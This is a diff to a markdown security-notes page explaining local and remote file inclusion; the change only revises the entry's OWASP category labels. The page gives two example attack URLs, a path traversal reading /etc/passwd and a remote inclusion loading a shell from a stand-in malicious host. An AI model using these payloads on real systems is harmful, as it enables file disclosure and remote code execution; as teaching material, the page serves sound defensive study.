IOxCyber/CyberEssentials/Security-Insights/Common Knowledge/WEB-Vulnerabilities/Indepth-Info/Broken-Access-Control003.md

 # 6. File Inclusion (Local and Remote):
 - File Inclusion vulnerabilities `allow an attacker to include files from the server (Local File Inclusion, LFI) or from remote servers (Remote File Inclusion, RFI)` into the executed script.
-- OWASP Category: `A01:2021 - Broken Access Control / A08:2021 - Software and Data Integrity Failures`
+- OWASP Category: `"A05:2021 Security Misconfiguration" or "A01:2021 Broken Access Control"`
 - Local File Inclusion (LFI): This allows an attacker to include files from the local server.
 Eg. `http://example.com/index.php?page=../../../../etc/passwd`
 - Remote File Inclusion (RFI): This allows an attacker to include files from a remote server.
 Eg. `http://example.com/index.php?page=http://malicious.com/shell`